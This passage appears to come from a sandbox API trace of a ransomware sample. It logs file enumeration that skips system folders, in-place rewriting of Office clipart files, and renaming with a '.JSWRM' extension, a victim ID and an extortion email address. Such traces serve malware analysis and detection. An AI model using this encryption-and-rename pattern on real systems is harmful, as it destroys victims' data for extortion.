lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0089945.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0079.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0079.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0079.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089945.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.461] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19898) returned 1 [0079.461] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4db0) returned 0x24d210 [0079.462] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4db0, lpOverlapped=0x0) returned 1 [0079.467] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.467] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4db0, lpOverlapped=0x0) returned 1 [0079.467] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.467] CloseHandle (hObject=0x314) returned 1 [0079.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.467] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0079.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0079.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0079.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0079.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0079.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.468] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089945.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089945.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089945.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0079.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.470] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d40, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0089992.WMF", cAlternateFileName="")) returned 1 [0079.470] lstrcmpiW (lpString1="J0089992.WMF", lpString2=".") returned 1 [0079.470] lstrcmpiW (lpString1="J0089992.WMF", lpString2="..") returned 1 [0079.470] lstrcmpiW (lpString1="J0089992.WMF", lpString2="...") returned 1 [0079.470] lstrcmpiW (lpString1="J0089992.WMF", lpString2="windows") returned -1 [0079.470] lstrcmpiW (lpString1="J0089992.WMF", lpString2="recovery") returned -1 [0079.470] lstrcmpiW (lpString1="J0089992.WMF", lpString2="perflogs") returned -1 [0079.470] lstrcmpiW (lpString1="J0089992.WMF", lpString2="documents and settings") returned 1 [0079.470] lstrcmpiW (lpString1="J0089992.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.470] lstrcmpiW (lpString1="J0089992.WMF", lpString2="system volume information") returned -1 [0079.470] lstrcmpiW (lpString1="J0089992.WMF", lpString2="msocache") returned -1 [0079.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0079.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0089992.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0089992.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0089992.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0079.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0089992.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0089992.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0089992.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0079.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0079.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089992.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.471] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15680) returned 1 [0079.471] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3d40) returned 0x24d210 [0079.471] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3d40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3d40, lpOverlapped=0x0) returned 1 [0079.473] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.473] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3d40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3d40, lpOverlapped=0x0) returned 1 [0079.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.474] CloseHandle (hObject=0x314) returned 1 [0079.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0079.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0079.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0079.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0079.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0079.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.474] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089992.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0089992.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0089992.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0079.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0079.475] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5314, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0090027.WMF", cAlternateFileName="")) returned 1 [0079.475] lstrcmpiW (lpString1="J0090027.WMF", lpString2=".") returned 1 [0079.475] lstrcmpiW (lpString1="J0090027.WMF", lpString2="..") returned 1 [0079.475] lstrcmpiW (lpString1="J0090027.WMF", lpString2="...") returned 1 [0079.475] lstrcmpiW (lpString1="J0090027.WMF", lpString2="windows") returned -1 [0079.475] lstrcmpiW (lpString1="J0090027.WMF", lpString2="recovery") returned -1 [0079.475] lstrcmpiW (lpString1="J0090027.WMF", lpString2="perflogs") returned -1 [0079.475] lstrcmpiW (lpString1="J0090027.WMF", lpString2="documents and settings") returned 1 [0079.475] lstrcmpiW (lpString1="J0090027.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.475] lstrcmpiW (lpString1="J0090027.WMF", lpString2="system volume information") returned -1 [0079.475] lstrcmpiW (lpString1="J0090027.WMF", lpString2="msocache") returned -1 [0079.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0079.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090027.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090027.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090027.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0079.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090027.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090027.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090027.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0079.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090027.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.476] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21268) returned 1 [0079.476] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5310) returned 0x24d210 [0079.476] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5310, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5310, lpOverlapped=0x0) returned 1 [0079.481] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.481] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5310, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5310, lpOverlapped=0x0) returned 1 [0079.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.481] CloseHandle (hObject=0x314) returned 1 [0079.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0079.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0079.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0079.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0079.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0079.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0079.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.482] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090027.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090027.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090027.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0079.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0079.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0079.482] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb758, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0090087.WMF", cAlternateFileName="")) returned 1 [0079.482] lstrcmpiW (lpString1="J0090087.WMF", lpString2=".") returned 1 [0079.482] lstrcmpiW (lpString1="J0090087.WMF", lpString2="..") returned 1 [0079.482] lstrcmpiW (lpString1="J0090087.WMF", lpString2="...") returned 1 [0079.482] lstrcmpiW (lpString1="J0090087.WMF", lpString2="windows") returned -1 [0079.482] lstrcmpiW (lpString1="J0090087.WMF", lpString2="recovery") returned -1 [0079.482] lstrcmpiW (lpString1="J0090087.WMF", lpString2="perflogs") returned -1 [0079.482] lstrcmpiW (lpString1="J0090087.WMF", lpString2="documents and settings") returned 1 [0079.482] lstrcmpiW (lpString1="J0090087.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.482] lstrcmpiW (lpString1="J0090087.WMF", lpString2="system volume information") returned -1 [0079.482] lstrcmpiW (lpString1="J0090087.WMF", lpString2="msocache") returned -1 [0079.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090087.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090087.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090087.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090087.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090087.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090087.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0079.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090087.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.484] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=46936) returned 1 [0079.484] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb750) returned 0x24d210 [0079.484] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb750, lpOverlapped=0x0) returned 1 [0079.489] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.489] WriteFile (in: 